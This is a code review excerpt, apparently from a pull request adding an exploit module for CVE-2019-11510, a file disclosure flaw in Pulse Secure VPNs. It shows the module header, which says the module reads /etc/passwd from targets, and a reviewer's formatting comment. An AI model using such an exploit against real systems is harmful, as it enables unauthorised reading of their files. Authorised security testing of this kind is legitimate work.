modules/exploits/linux/http/pulse_secure_file_disclosure.rb

```diff
@@ -0,0 +1,73 @@
+# Quick hackish exploit for the CVE-2019-11510
+# made with help from Alyssa Herrera
+# Sorry for using your exploit as a template Carlos E. Vieira
+# Grabs /etc/passwd as a proof of concept
+
+require 'msf/core'
+class MetasploitModule < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Post::File
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Pulse Secure - System file leak',
+			'Description'    => %q{
+				Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
+        This exploit reads /etc/passwd and displays it to the terminal.
+        This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+			},
+			'References'     =>
+			    [
+			        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
```

Comment:
Please use `CVE` key for CVE details.

```suggestion
			        [ 'CVE', '2019-11510' ]
```